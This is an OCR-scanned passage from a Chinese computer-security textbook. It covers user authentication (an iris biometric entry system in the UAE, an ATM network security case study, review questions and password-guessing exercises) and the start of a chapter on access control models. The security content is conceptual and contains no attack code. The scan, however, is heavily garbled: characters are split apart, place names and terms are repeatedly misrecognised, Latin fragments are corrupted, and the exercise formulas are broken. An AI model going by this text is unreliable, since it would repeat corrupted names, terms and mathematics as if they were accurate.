具 可 选 性 的 攻击 通过 下 面 的 方法 拒绝 对 特定 用 户 的 服务 ， 多 次 尝试 登录 导致 尝试 次 数 达 到 系统 
设 定 的 阔 值 而 使 得 该 用 户 由 于 尝试 次 数 过 多 而 被 锁定 。 一 种 包含 令 牌 的 多 因素 认证 协议 可 以 防 
止 这 种 攻击 ， 由 于 敌手 必须 首先 得 到 一 个 令 牌 ， 因 此 会 使 得 这 种 攻击 无 效 。 


3.7 ”实际 应 用 : 虹膜 生物 特征 认证 系统 


作为 生物 特征 认证 系统 的 一 个 例子 ， 我们 研究 了 为 阿拉 伯 联 合 疯 长 国 ( 人 简称 阿 联 背 , UAE) 
开发 的 用 于 入 境 安 全 监测 的 虹膜 生物 特征 认证 系统 [DAUG04，TIRO05，NBSP08]。 阿 联 英 十 
分 依赖 外 来 劳动 力 ， 而 且 也 逐渐 成 为 国际 化 的 旅游 景点 。 因 此 ， 相 对 于 其 国土 面积 ， 阿 联 阁 
的 入境 游客 总 量 着 实 巨 大 。 通 常 一 天 内 ， 通 过 七 个 国际 机 场 、 三 个 陆地 港口 以 及 七 个 海 尾 港 
口 ， 会 有 共计 超过 6500 名 乘客 进入 阿联酋 。 因 而 高 效 地 管理 大 量 入 境 游客 成 为 一 个 必须 面 对 
的 安全 挑战 。 特 别 值得 关注 的 是 ， 许 多 被 阿联酋 驱逐 的 人 经 常会 试图 再 次 进入 。 传 统 的 阻止 再 
次 进入 的 方法 涉及 个 人 身份 验证 ， 包 括 检查 姓名 、 出 生日 期 以 及 其 他 基本 信息 。 但 是 ， 这 样 做 
是 存在 风险 的 。 当 事 人 在 被 驱逐 后 可 以 修改 其 个 人 信息 ， 并 利用 一 个 与 原 护 照 截然 不 同 的 护照 
入境。 

为 了 对 抗 这 种 再 人 行为 ， 阿 联 黄 政府 决定 引入 生物 特征 认证 系统 ， 且 该 系统 具备 以 下 
特点 : 
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© 从 海量 的 人 群 中 识别 出 个 人 。 

© 依赖 于 某 项 长 期 不 变 的 生物 特征 。 

© 该 生物 特征 易于 提取 。 

© TEH. 

o 对 于 大 量 交通 应 用 能 够 做 到 实时 啊 应 。 

e 安全 无 伤害 。 

o 能 够 在 超大 的 范围 内 进行 区 分 并 具备 顶尖 的 性 能 。 

o 价格 上 负担 得 起 。 

综 上 ， 选 择 使 用 虹膜 认证 最 为 简洁 高 效 。 全 世界 没有 两 个 相同 的 虹膜 ， 即 使 是 双胞胎 或 同 
一 个 人 的 左 眼 和 右 眼 。 

认证 系统 的 实现 涉及 登记 和 身份 检查 。 所 有 被 驱逐 的 外 来 人 士 必须 在 条 一 个 登录 中 心 进行 
虹膜 扫描 ， 并 将 扫描 信息 记 入 中 央 数 据 库 。 阿 联 背 全 部 17 个 人 境 口 均 设 有 虹膜 扫描 仪 。 一 个 
虹膜 识别 相机 会 在 距 眼 球 5 至 24 英寸 的 地 方 (取决 于 相机 ) FARRAR. PAOLA DCE 89 
近 红 外 照明 技术 ,该 技术 几乎 不 可 见 且 绝对 安全 ， 类 似 电视 的 远程 到 控 。 为 了 提取 出 虹膜 的 一 
部 分 ， 软 件 首先 采集 图 片 以 确定 虹膜 的 内 外 边界 及 眼 瞪 的 轮 廊 。 接 着 ， 软 件 将 虹膜 的 纹理 转化 
为 数字 编码 ， 类 似 DNA 序列 编码 。 虹 膜 的 独 有 特征 会 被 捕 提 到 编码 中 ,并 可 与 数据 库 中 已 存 
储 的 虹膜 编码 进行 比较 以 判断 是 否 匹 配 。 通 过 分 布 式 网 络 ( 见 图 3-14 )， 所 有 和信 境 乘 客 的 虹膜 
编码 可 被 实时 地 全 方位 地 与 中 央 数 据 库 中 的 编码 进行 比较 。 


虹膜 扫描 仪 虹膜 扫描 仪 虹膜 扫描 仪 


B p 


虹膜 认证 虹膜 认证 
工作 站 工作 站 










局 域 网 交换 机 


图 3-14 阿 联 黄 虹膜 认证 系统 的 设备 总 体 架 构 


值得 注意 的 是 ， 虹 膜 认 证 已 远 不 止 是 一 个 验证 身份 的 工作 ， 其 中 更 主要 的 工作 还 是 艰巨 
的 计算 任务 。 在 这 种 情况 下 ， 每 名 人 境 乘客 的 虹膜 图 像 需 要 与 整个 数据 库 中 的 已 知 图 像 进 行 比 
较 。 考 虑 到 当前 的 客流 量 和 数据 库 的 大 小 ， 每 天 的 虹膜 比较 次 数 超过 90 亿 次 。 

与 其 他 安全 系统 一 样 ， 总 会 有 敌手 寻找 应 对 虹膜 认证 系统 的 方法 。 曾 有 被 禁止 人 境 的 侨民 利 
用 滴 眼 液 扩张 虹膜 ， 以 通过 虹膜 认证 系统 而 绸 次 进入 阿 联 黄 。 阿 联 黄 官 方 不 得 不 采用 了 一 些 新 的 
安全 措施 以 监测 此 类 行为 。 新 算法 和 逐步 计算 流程 的 实施 有 助 于 判断 虹膜 处 于 常态 还 是 经 过 扩张 。 
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3.8 案例 学 习 : ATM 系统 的 安全 问题 


提供 独立 审计 服务 的 Redspin 公司 ， 最 近 发 布 了 一 份 描述 ATM (自动 柜员 机 ) 使 用 方面 的 
安全 漏洞 报告 ， 对 很 多 中 小 型 的 ATM 发 卡 机 构 产 生 了 影响 。 报 告 使 用 一 些 案例 来 说 明 单 独 使 
用 密码 功能 和 服务 并 不 能 确保 真正 的 安全 ,但 它们 必须 作为 系统 的 重要 部 分 来 实现 。 
我 们 先 来 定义 本 市 使 用 的 术语 : 
© 持 卡 人 (cardholder): 拥有 借 记 卡 的 个 人 。 通 和 背 该 持 卡 人 同时 有 义务 偿还 该 卡 使 用 过 程 
中 的 全 部 费用 。 

© AEM (issuer): 发 行 借 记 卡 给 持 卡 人 的 机 构 。 这 个 机 构 负 责 持 卡 人 的 账户 并 授权 所 
有 交易 。 银 行 和 信用 机 构 就 是 典型 的 发 卡 机 构 。 

e 处 理 商 (processor): 为 发 卡 机 构 提 供 核心 数据 处 理 (口令 认证 和 账户 信息 更 新 )、 电 子 
资金 转账 ( Electronic Fund Transfer, EFT) 以 及 其 他 服务 的 组 织 机 构 。 电 子 资金 转账 
服务 允许 发 卡 机 构 访问 连接 全 世界 的 销售 点 (Point Of Sale, POS) 设备 和 ATM 的 地 
区 和 国内 网 络 。 例 如 ， 富 达 国 家 金融 公司 (Fidelity National Financial) 和 Jack Henry & 
Associates 都 是 这 样 的 机 构 。 

客户 期 望 ATM 提供 每 周 7 天、 每 天 24 小 时 的 服务 。 对 于 很 多 中 小 型 的 发 卡 机 构 ， 通 过 
处 理 商 来 提供 数据 处 理 和 电子 资金 转账 /ATM 服务 可 以 降低 运营 成 本 。 每 项 服务 一 般 要 求 使 用 
租用 的 专用 线路 或 虚拟 线路 来 连接 发 卡 机 构 和 处 理 商 。 

大 约 2003 年 以 前 的 典型 配置 包括 发 卡 机 构 、 处 理 商 以 及 ATM 终端 设备 ， 如 图 3-15a 所 
IRo ATM 终端 设备 通过 租用 的 线路 直接 连接 到 处 理 商 而 不 是 拥有 该 ATM 的 发 卡 机 构 。 使 用 专 
用 线路 可 以 防止 数据 在 传输 过 程 中 被 恶意 截获 。 为 了 增加 安全 性 ， 从 ATM 终端 设备 到 处 理 商 
传送 的 消息 的 PIN 部 分 使 用 DES 加 密 。 处 理 商 连接 到 EFT (电子 资金 转账 ) 交换 网 络 使 得 持 卡 
人 可 以 从 任何 ATM 终端 设备 访问 自己 的 账户 。 采 用 图 3-15a 的 配置 ， 一 笔 交 易 的 处 理 过 程 如 下 : 
用 户 在 ATM 终端 设备 上 插入 他 的 卡 ， 并 输入 PIN, ATM 终端 设备 对 PIN 进行 加 密 并 将 其 传输 到 
处 理 商 作为 认证 请 求 的 一 部 分 。 之 后 ， 处 理 商 更 新 客户 的 账户 信息 并 发 送 一 个 回应 消息 。 


( 如 银行 ) iH 3 

= 处 理 商 
= ( 如 Fidelity ) 
发 卡 机 构 拥 有 的 ATM 
a) 到 处 理 商 的 点 对 点 连接 
发 卡 机 构 
(如 银行 ) 
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—t ( 如 Fidelity ) 
发 卡 机 构 拥 有 的 ATM 
b) 到 处 理 商 的 共享 连接 


图 3-15 ATM 体系 结构 。 很 多 中 小 型 的 借 记 卡 发 卡 机 构 与 处 理 商 签订 合同 由 其 提供 核心 数据 
处 理 和 电子 资金 转账 (EFT) 服务 。 银 行 的 ATM 机 可 以 直接 与 处 理 商 或 银行 连接 
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在 21 世纪 初 ， 世 界 范围 内 的 各 大 银行 开始 使 用 新 的 运行 Windows 的 系统 来 代替 ATM & 
端 设备 上 的 采用 IBM OS/2 操作 系统 的 老 系统 。 如 此 大 规模 地 向 Windows 的 移植 是 由 很 多 原 
因 造 成 的 ,包括 IBM 公司 到 2006 年 停止 对 OS/2 操作 系统 支持 的 决定 、 来 自 MasterCard 国际 
组 织 和 Visa 国际 组 织 等 信用 卡 组 织 引 入 更 强 的 三 重 DES 加 密 的 市 场 压 力 以 及 美国 调控 机 构 要 
求 对 失效 用 户 引 入 新 特征 的 压力 。 很 多 银行 ， 例 如 那些 被 Redspin 公司 审计 的 银行 ， 在 引入 
Windows 和 三 重 DES 的 同时 ， 还 使 用 了 很 多 其 他 的 安全 增强 措施 ， 特 别 是 采用 TCP/IP 协议 进 
行 网 络 传输 。 

由 于 发 卡 机 构 通 常 运 行 与 Internet 连接 的 局 域 网 和 采用 TCP/IP 协议 的 内 联网 (intranet), 
这 就 使 得 将 ATM 与 发 卡 机 构 网 络 连接 ， 仅 维护 一 条 连接 到 处 理 商 的 专用 线路 的 方案 颇具 吸 
引力 ， 这 个 配置 如 图 3-15b 所 示 。 这 种 配置 方法 为 发 卡 机 构 节 省 了 每 月 昂贵 的 线路 费用 ， 并 
使 ATM 易于 由 发 卡 机 构 管 理 。 在 这 种 配置 中 ， 由 ATM 发 送 至 处 理 商 的 数据 要 穿越 发 卡 机 构 
网 络 后 才能 发 送 给 运营 商 。 因 此 ， 客 户 信息 处 于 发 卡 机 构 网 络 的 这 段 时 间 内 是 易 受 到 安全 威 
胁 的 。 

升级 到 新 的 ATM 终端 操作 系统 和 新 的 通信 配置 后 ， 安 全 方面 唯一 的 加 强 就 是 对 PIN 使 用 
J = DES 而 不 是 DES 加 密 。 而 ATM 终端 设备 发 送 的 其 他 数据 都 是 明文 传输 的 ， 包 括 卡 号 、 
有 效 期 、 账 户 余额 、 提 和 鞭 金 额 。 黑 客 可 以 从 内 部 或 通过 Internet 接 人 到 银行 网 络 ， 从 而 可 以 访 
问 每 一 笔 ATM 交易 。 

以 上 描述 的 这 种 情况 会 导致 两 个 主要 的 漏洞 : 

e 机 密 性 : 卡号 、 有 效 期 、 账 户 余额 这 些 信息 可 以 用 于 网 上 购物 ， 或 者 用 于 复制 一 张 卡 

来 进行 基于 签名 的 交易 。 

e 完整 性 : 在 通信 中 没有 提供 安全 措施 以 防止 攻击 者 注入 或 修改 传输 中 的 数据 。 如 果 数 
据 在 通信 中 被 敌手 截获 到 ， 那 么 攻击 者 就 可 以 冒充 处 理 商 或 者 ATM。 攻 击 者 一 旦 伪装 
成 运营 商 ， 那 么 攻击 者 就 可 以 直接 在 ATM 上 进行 转账 ， 而 真正 的 处 理 商 却 对 这 笔 交 易 
一 无 所 知 。 如 果 攻 击 者 截获 到 用 户 的 账户 和 加 密 的 PIN 信息 ， 那 么 账户 的 安全 在 改变 
ATM 加 密 密 钥 之 前 将 一 直 受 到 威 肋 ， 使 得 敌手 可 以 修改 账户 余额 或 进行 转账 。 

Redspin 公司 应 对 这 些 安全 威胁 为 银行 提供 了 很 多 建议 。 一 种 短期 的 解决 方案 包括 把 ATM 
的 流量 从 整个 网 络 的 流量 中 分 离 出 来 ， 可 以 通过 使 用 严格 的 防火 墙 过 滤 规 则 ， 或 者 物理 地 对 整 
个 网 络 进行 分 割 。 另 一 个 短期 方案 是 在 ATM 流量 通过 的 路 由 器 之 间 进 行 网 络 级 的 加 密 。 

长 期 的 方案 包括 更 换 应 用 级 软件 ， 对 在 网 络 中 传输 的 所 有 客户 相关 信息 进行 加 密 保护 。 为 
确保 数据 的 完整 性 ， 在 ATM 和 处 理 商 之 间 需 要 进行 设备 对 设备 的 认证 ， 并 使 用 挑战 - 应 答 协 
议 来 对 抗 重 放 攻击 。 


3.9 关键 术语 、 复 习题 和 习题 


关键 术语 

biometric (生物 特征 ) hashed password ( 散 列 口令 ) 
challenge-response protocol (挑战 - 应 答 协 议 ) identification (识别 ) 

claimant (请 求 者 ) memory card (存储 卡 ) 

credential (WEP, SEHE) password (口令 ) 

Credential Service Provider (CSP， 证 书 服务 提供 商 ) rainbow table (彩虹 表 ) 

dynamic biometric (动态 生物 特征 ) Registration Authority (RA， 注 册 中 心 ) 


enroll( 注 册 ) Relying Party (RP， 依 赖 方 ) 


salt ( 盐 值 ) token ( 令 牌 ) 
shadow password file (影子 口令 文件 ) user authentication (用 户 认 证 ) 
smart card (智能 卡 ) verification (验证 ) 
static biometric (静态 生物 特征 ) verifier (验证 者 ) 
subscriber (用 户 ， 订 户 ) 
复习 题 
3.1 用 户 认证 通常 的 四 种 方法 是 什么 ? 
3.2 列举 并 简单 描述 口令 保密 的 主要 威胁 。 
3.3 ”保护 用 户口 令 文件 的 两 个 常用 方法 是 什么 ? 
3.4 列举 并 简单 描述 设置 和 选择 口令 的 四 种 常用 方法 。 
3.5 请 说 明 人 简单 存储 卡 和 智能 卡 的 区 别 。 
3.6 ”列举 并 简单 描述 生物 特征 认证 方法 所 使 用 的 主要 身体 特征 。 
3.7 ”请 解释 在 生物 特征 认证 中 使 用 的 术语 : 注册 、 验 证 和 识别 。 
3.8 定义“ 误 匹配 率 ” 和 “ 漏 匹 配 率 " ， 并 解释 国 值 在 两 者 的 关系 中 的 作用 。 
3.9 描述 “挑战 — 应答 协议 ”的 原理 。 
习题 
3.1 解释 以 下 口令 是 否 合适 : 
a. YK344 
b. mfmitm (for my favorite movie is tender mercies) 
c. Nataliel 
d. Washington 
e. Aristotle 
f. tv9stove 
g. 12345678 
h. dribgib 
3.2 早期 试图 强迫 用 户 使 用 不 可 预测 的 口令 ， 包 括 系统 给 用 户 分 配 的 口令 。 口 令 的 长 度 为 8 个 字符 ， 并 
且 是 从 包括 了 小 写字 母 和 数字 的 字符 集中 选择 的 。 口 令 是 由 具有 2 个 可 能 起 始 值 的 随机 数 产生 的 。 
依照 目前 的 技术 水 平 ， 搜 索 所 有 36 字符 的 字母 表 中 的 长 度 为 8 的 字符 串 需 要 112 年 的 时 间 。 不 幸 
的 是 ， 这 并 不 能 真实 地 反映 口令 面临 的 安全 性 问题 。 请 解释 其 中 的 原因 。 
3.3 从 26 个 字母 中 选择 4 个 字符 作为 口令 ， 假 设 敌 手 每 秒 钟 只 可 以 尝试 一 次 口令 破解 。 
a. 如 果 直 到 一 次 尝试 结束 时 才 给 敌手 一 个 反馈 信息 ， 那 么 发 现 正确 口令 的 预计 时 间 是 多 少 ? 
b. 如 果 在 每 次 输入 不 正确 的 字符 时 就 会 有 错误 的 标志 返回 给 敌手 ， 那 么 发 现 正确 口令 的 预计 时 间 是 
多 少 ? 
3.4 ”假设 长 度 为 k 的 源 数 据 元 素 通 过 某 种 方式 映射 到 一 些 具有 相同 格式 的 长 度 为 p 的 目标 元 素 上 。 如 果 
每 一 个 数字 都 有 r+ 个 值 可 取 ， 那 么 源 数 据 元 素 的 数量 是 x*， 目 标 元 素 的 数量 较 小 ， 为 r?。 一 个 数据 
元 素 x;， 被 映射 到 目标 数据 元 素 Vio 
a. 敌手 一 次 就 可 以 通过 目标 元 素 正 确 地 选 出 源 数据 元 素 的 概率 是 多 大 ? 
b. 如 果 另 外 一 个 不 同 的 源 数据 元 素 xk Oax) 也 可 以 映射 到 同一 个 目标 数据 元 素 y xe 被 敌手 选中 
的 概率 是 多 大 ? 
c. 攻击 者 只 尝试 一 次 就 能 选中 正确 的 目标 数据 元 素 的 概率 是 多 大 ? 
3.5 一 个 语音 口令 生成 器 ， 可 以 随机 生成 一 个 由 两 部 分 组 成 的 6 个 字符 的 口令 , 口令 每 一 个 组 成 部 分 的 


形式 为 CVC (辅音 ,元 音 ， 辅 音 )。 其 中 V= {a, e, i, o, u} 是 元 音字 母 的 集合 ，C=F。 
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3.6 


Sut 


3.8 


3:9 


3.10 


3.11 


3.12 


B-A 计算 机 安全 技术 与 原理 


a. 在 这 种 情况 下 口令 的 总 数 可 能 有 多 少 个 ? 
b. 攻击 者 猜 中 口令 的 概率 是 多 少 ? 
假设 口令 被 限定 在 95 个 可 打印 的 ASCI 字符 中 选择 ， 并 且 所 有 的 口令 都 是 10 个 字符 长 度 。 如 果 一 
个 口令 破解 者 每 秒 钟 可 以 加 密 640 万 个 口令 ， 那么 在 UNIX 系统 中 ， 他 需要 花 多 长 的 时 间 才 能 测试 
完成 所 有 可 能 的 口令 ? 
由 于 UNIX 口令 系统 存在 着 众所周知 的 脆弱 性 ，SunOS 4.0 文档 建议 删除 口令 文件 ， 并 使 用 一 种 公 
众 可 读 文件 /etc/publickey 取而代之 。 对 于 用 户 A 而 言 ， 该 文件 中 与 用 户 A 对 应 的 条 目 包括 用 户 喘 
份 IDa, HAS PU, 和 对 应 的 私 钥 PR。。 这 个 私 钥 PR, 是 经 过 DES 加 密 的 ， 而 密 钥 是 由 用 户 登 录 
口令 P, 派生 的 。 当 用 户 A 登录 到 系统 时 ， 系 统 通过 EPa, PR.) 对 进行 解密 来 得 到 PR。。 
a. 系统 如 何 验证 以 确保 口令 Pa 的 正确 性 ? 
b. 针对 这 种 系统 ， 敌 手 如 何 进 行 攻击 ? 
我 们 知道 ， 在 UNIX 系统 的 口令 方案 中 引信 盐 值 大 大 地 增加 了 口令 猜 解 的 难度 (难度 是 原来 的 4096 
倍 )。 但 是 ， 盐 值 以 明文 的 形式 和 经 过 加 密 的 口令 一 起 存放 在 口令 文件 中 ， 攻 击 者 无 须 猜 解 就 可 以 
得 到 盐 值 以 及 加 密 的 口令 。 那 么 ， 为 什么 可 以 断言 使 用 盐 值 能 够 提高 口令 的 安全 性 ? 
如 果 你 已 经 成 功 地 回答 了 习题 3.8 中 的 问题 ,并 且 理 解 了 盐 值 的 意义 。 那 么 男 一 个 问题 是 ， 有 没有 
可 能 通过 显著 增加 盐 值 的 长 度 (比如 增加 到 24 位 或 48 位 ) 来 完全 避免 所 有 的 口令 攻击 ? 

参考 3.2 节 介 绍 的 Bloom 过 滤器 (Bloom filter)， 定 义 上 为 散 列 函 数 的 个 数 ，N 为 散 列表 的 位 数 ，D 

表示 口令 字典 的 词汇 量 。 

a. 证 明 散 列表 中 等 于 0 的 位 数 的 期 望 值 可 以 表示 为 

(ay 
b. 证 明 输入 的 词汇 不 在 口令 字典 中 却 被 错误 接受 的 概率 为 
P=(1—¢ 7 
c. WEAR (b) 中 的 表达 式 可 以 近似 为 
P=(1—e 

对 于 图 3-13 所 表示 的 生物 特征 认证 协议 ， 在 静态 生物 特征 认证 中 生物 特征 采集 设备 也 需要 被 认证 ， 

而 动态 生物 特征 认证 中 却 不 需要 对 生物 特征 采集 设备 进行 认证 。 请 解释 其 中 的 原因 。 

安全 快速 可 靠 登 录 (Secure Quick Reliable Login, SQRL) 是 最 近 提 出 的 新 认证 方案 ， 在 Web 站 点 

https://www.grc.com/sqrl/sqrl.htm 上 有 相关 描述 。 就 SQRL 如 何 运作 写 一 篇 总 结 ， 并 阐明 本 章 列 举 

的 各 种 用 户 认 证 类 型 在 SQRL 中 的 适用 情况 。 
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学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 

解释 访问 控制 是 如 何 适 用 于 包括 认证 、 授 权 和 审计 等 在 内 的 更 广泛 的 语 境 的 ; 
定义 三 种 主要 类 别 的 访问 控制 策略 ， 
区 分 主体 、 客 体 和 访问 权 ; 

描述 UNIX 文件 访问 控制 模型 ; 

讨论 基于 角色 的 访问 控制 的 主要 概念 ; 

总 结 RBAC 模型 ; 

讨论 基于 属性 的 访问 控制 的 主要 概念 ; 

解释 身份 、 赁 证 和 访问 管理 模型 ; 

理解 身份 联合 的 概念 及 其 与 信任 框架 的 关系 。 


下 述 关于 访问 控制 的 定义 对 于 理解 其 所 涉及 的 范围 是 非常 有 益 的 : 
1. NIST IR 7298《 信 息 安 全 关键 名 词 术 语 》 定 义 访问 控制 为 授予 或 拒绝 下 列 特定 要 求 的 过 
Fe: (1) 获得 并 使 用 信息 及 相关 信息 处 理 服务 ; (2) 进入 特定 物理 设施 。 
2. RFC 4949《 Internet 安全 术语 》 定 义 访问 控制 为 这 样 一 个 过 程 : 实现 依据 安全 策略 对 使 
用 系统 资源 进行 控制 ， 且 仅 许 可 授权 实体 (用 户 、 程 序 、 进 程 或 其 他 系统 ) 依据 该 策略 使 用 系 
统 资源 。 
我 们 可 以 把 访问 控制 看 作 计 算 机 安全 的 核心 元 素 。 计 算 机 安全 的 主要 目标 是 防止 非 授 权 
用 户 获 得 对 资源 的 访问 ， 防 止 合法 用 户 以 非 授 权 方 式 访 问 资源 ， 使 合法 用 户 以 授权 方式 访问 资 
Wio K 4-1 来 自 NIST SP 800-171 (在 非 联 邦 信息 系统 和 组 织 中 保护 可 控 的 未 分 类 信息 ，2016 
年 8 月 )， 提 供 了 一 个 访问 控制 服务 安全 要 求 的 有 效 列表 。 
上 面 我 们 对 一 些 相关 的 重要 概念 进行 了 概述 ， 接 着 详细 介绍 三 种 广泛 采用 的 访问 控制 策略 
的 实现 技术 ,然后 从 更 广阔 的 视角 审视 采用 身份 、 凭 证 和 属性 实现 访问 控制 的 总 体 管理 问题 。 
最 后 ,介绍 信任 框架 的 概念 。 
表 4-1 访问 控制 安全 要 求 (SP 800-171 ) 
基本 安全 要 求 
1 限制 信息 系统 对 授权 用 户 、 代 表 授 权 用 户 的 进程 或 设备 (包括 其 他 信息 系统 ) 的 访问 
2 限制 信息 系统 对 各 种 类 型 的 事务 和 授权 用 户 允 许 执行 的 功能 的 访问 
派生 的 安全 要 求 





3 根据 批准 的 授权 控制 CUI 流 

4 分 离 个 人 职责 以 减少 不 共 谋 的 恶意 活动 的 风险 

5 采用 最 小 权限 原则 ， 包 括 特定 安全 功能 和 特权 账号 

6 当 访问 非 安全 功能 时 ， 使 用 非特 权 账 号 或 角色 

7 阻止 非特 权 用 户 执行 特权 功能 和 执行 这 些 功 能 的 审计 
8 限制 不 成 功 的 登录 尝试 
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派生 的 安全 要 求 

9 提供 与 合适 的 CUI 规则 一 致 的 隐私 和 安全 注意 通知 
10 使 用 带 有 模式 隐藏 显示 的 会 话 锁 ， 以 防止 在 未 活动 期 间 访 问 和 查看 数据 
11 在 定义 的 条 件 后 (自动 ) 终止 一 个 用 户 会 话 
12 监测 和 控制 远程 访问 会 话 
13 使 用 密码 机 制 保护 远程 访问 会 话 的 机 密 性 
14 通过 受 管理 的 访问 控制 点 路 由 远程 访问 
15 授权 特权 命令 的 远程 执行 以 及 与 安全 相关 的 信息 的 远程 访问 
16 在 允许 连接 之 前 授权 无 线 访问 
17 使 用 认证 和 加 密 保 护 无 线 访 问 
18 控制 移动 设备 的 连接 
19 在 移动 设备 上 加 密 CUI 
20 对 外 部 信息 系统 的 连接 和 使 用 进行 验证 和 控制 / 限制 
21 限制 在 外 部 信息 系统 上 使 用 组 织 的 移动 存储 设备 
22 控制 CUI 在 公共 可 访问 系统 上 发 布 或 处 理 

CUI= 受 控 非 保 密 信息 (Controlled Unclassified Information ) 


RM: NIST SP 800-171 在 非 联邦 信息 系统 和 组 织 中 保护 可 控 的 未 分 类 信息 ，2016 年 12 月， 美国 国家 标准 技术 


研究 所 (NIST)， 美 国 商务 部 。 


4.1 访问 控制 原理 


从 广义 上 来 讲 ， 所 有 的 计算 机 安全 都 与 访问 控制 有 关 。 实 际 上 ，RFC 4949 定义 计算 机 安 
全 如 下 : 用 来 实现 和 保证 计算 机 系统 的 安全 服务 的 措施 ， 特 别 是 保证 访问 控制 服务 的 措施 。 本 
章 讨论 的 访问 控制 的 概念 更 狭义 、 更 具体 : 访问 控制 实现 的 安全 策略 是 ， 指 定 对 于 每 个 具体 的 


系统 资源 ， 谁 或 什么 (如 一 个 进程 ) 可 以 访问 ， 以 及 每 个 实例 允许 的 访问 类 型 。 
4.1.1 访问 控制 语 境 


图 4-1 显示 了 访问 控制 更 广义 的 语 境 。 除 去 访问 控制 ， 这 个 广义 的 语 境 还 涉及 下 面 的 实体 


和 功能 : 





图 4-1 访问 控制 与 其 他 安全 功能 的 关系 


RR: 基于 [SAND94] 
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e wAiE (authentication): 验证 用 户 或 其 他 系统 实体 声称 的 身份 是 有 效 的 。 
e 授权 (authorization): 授予 系统 实体 访问 系统 资源 的 权限 和 许可 。 这 一 功能 确定 谁 对 于 
给 定 的 目的 是 可 信 的 。 
e Hit (audit): 对 系统 记录 和 活动 进行 独立 评审 和 检查 ， 以 便 测 试 系统 控制 措施 的 充分 
性 ， 确 保 符合 既定 的 策略 和 操作 规程 ， 检 测 安全 违规 ， 并 推荐 控制 措施 、 策 略 和 规程 
应 采取 的 相应 变化 。 
访问 控制 机 制 在 用 户 (或 代表 用 户 执行 的 进程 ) 与 系统 资源 (如 应 用 、 操 作 系 统 、 防 火 墙 、 
路 由 大、 文件 和 数据 库 ) 之 间 工 作 。 系 统 必须 首先 认证 试图 访问 的 用 户 。 一 般 地 ， 认 证 功能 决 
定 用 户 是 否 被 允许 访问 整个 系统 。 进 而 ,访问 控制 功能 决定 是 否 允 许 这 个 用 户 具 体 的 访问 请 
求 。 安全 管理 员 维护 的 授权 数据 库 指定 这 个 用 户 对 哪些 资源 的 什么 类 型 的 访问 是 被 允许 的 。 访 
问 控 制 功能 查询 这 个 数据 库 ， 确 定 是 否 对 其 授予 访问 权 。 审 计 功 能 监视 并 保存 用 户 访问 系 统 资 
源 的 记录 。 
在 图 4-1 的 简单 模型 中 ， 访 问 控制 功能 作为 一 个 单独 的 逻辑 模块 。 在 实践 中 ， 许 多 组 件 可 
以 共享 访问 控制 功能 。 所 有 的 操作 系统 都 至 少 有 一 个 基本 的 、 很 多 情况 下 非常 健壮 的 访问 控制 
组 件 。 附 加 的 安全 包 可 以 增强 OS 的 本 地 访问 控制 能 力 。 特 殊 的 应 用 或 实用 程序 ， 如 数据 库 管 
理 系 统 ， 也 加 入 了 访问 控制 功能 。 外 部 设备 (如 防火 墙 ) 也 能 提供 访问 控制 服务 。 


41.2 ”访问 控制 策略 


包含 在 授权 数据 库 中 的 访问 控制 策略 用 来 指出 什么 类 型 的 访问 在 什么 情况 下 被 谁 允许 。 访 
问 控制 策略 一 般 分 成 以 下 几 类 : 
e 自主 访问 控制 (Discretionary Access Control, DAC): 基于 请 求 者 的 身份 和 访问 规则 ( 授 
AL) 控制 访问 ， 规 定 请 求 者 可 以 (或 不 可 以 ) 做 什么 。 这 种 策略 被 称 为 “自主 的 ”是 因 
为 允许 一 个 实体 按 其 自己 的 意志 授予 另 一 个 实体 访问 某 些 资源 的 权限 。 
强制 访问 控制 ( Mandatory Access Control，MAC ) : 通过 比较 具有 安全 许可 (表明 系统 
实体 有 资格 访问 某 种 资源 ) 的 安全 标记 (表明 系统 资源 的 敏感 或 关键 程度 ) 来 控制 访 
问 。 这 种 策略 被 称 为 “强制 的 ”是 因为 一 个 具有 访问 某 种 资源 的 许可 的 实体 不 能 按 其 
目 己 的 意志 授予 另 一 个 实体 访问 那 种 资源 的 权限 。 
e 基于 角色 的 访问 控制 ( Role-Based Access Control, RBAC): 基于 用 户 在 系统 中 所 具有 
的 角色 和 说 明 各 种 角色 用 户 享 有 哪些 访问 权 的 规则 来 控制 访问 。 
e 基于 属性 的 访问 控制 (Attribute-Based Access Control, ABAC): 基于 用 户 、 被 访问 资源 
及 当前 环境 条 件 来 控制 访问 。 
DAC 是 实现 访问 控制 的 传统 方法 ， 我 们 将 在 4.3 节 和 4.4 节 中 对 其 进行 研究 。MAC 是 起 
源 于 军事 信息 安全 需求 的 概念 ， 在 第 27 章 讨论 可 信 系 统 语 境 时 将 对 其 进行 详细 介绍 。RBAC 
和 ABAC 虱 已 日 益 流行 ， 分别 在 4.5 节 和 4.6 节 人 研究 。 
这 四 种 策略 并 不 是 互相 排斥 的 。 一 种 访问 控制 机 制 可 以 使 用 两 种 甚至 全 部 策略 来 处 理 不 同 
类 别 的 系统 资源 。 


42 ” 主体、 客体 和 访问 权 


访问 控制 的 基本 元 系 是 : 主体 、 客 体 和 访问 权 。 

EE (subject) 是 能 够 访问 客体 的 实体 。 一 般 地 ， 主 体 的 概念 等 同 于 进程 的 概念 。 任 何 用 
户 或 应 用 实际 上 通过 代表 该 用 户 或 应 用 的 进程 来 访问 客体 。 进 程 使 用 用 户 的 属性 ， 如 访问 权 。 

主体 应 该 对 他 们 发 起 的 动作 负责 ， 可 以 用 审计 迹 (audit trail) 来 记录 主体 与 其 施加 在 客体 
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上 的 关系 安全 的 动作 之 间 的 关联 。 
基本 访问 控制 系统 一 般 定义 了 三 类 主体 ， 每 类 具有 不 同 的 访问 权 : 
e 所 有 者 (owner): 可 以 是 资源 (如 文件 ) 的 创建 者 。 对 于 系统 资源 ， 所 有 权 可 以 属于 系 
统管 理 员 。 对 于 项 目 资源 ， 项 目 管理 员 或 负责 人 可 以 被 分 配 所 有 权 。 
e 组 (group): 除去 分 配给 所 有 者 的 特权 ， 命 名 组 的 用 户 也 可 以 被 授予 访问 权 ， 以 便 具 有 
组 的 成 员 资 格 就 具有 足够 的 访问 权 。 在 大 多 数 方案 中 ， 一 个 用 户 可 以 属于 多 个 组 。 
o 世界 (world): 被 授予 最 少 访问 权 的 用 户 ， 他 们 能 够 访问 系统 ， 但 不 包含 在 该 资源 的 属 
主 类 和 属 组 类 中 。 
客体 〈object) 是 外 界 对 其 访问 受到 控制 的 资源 。 一 般 地 ， 客 体 是 一 个 用 来 包含 或 接收 信 
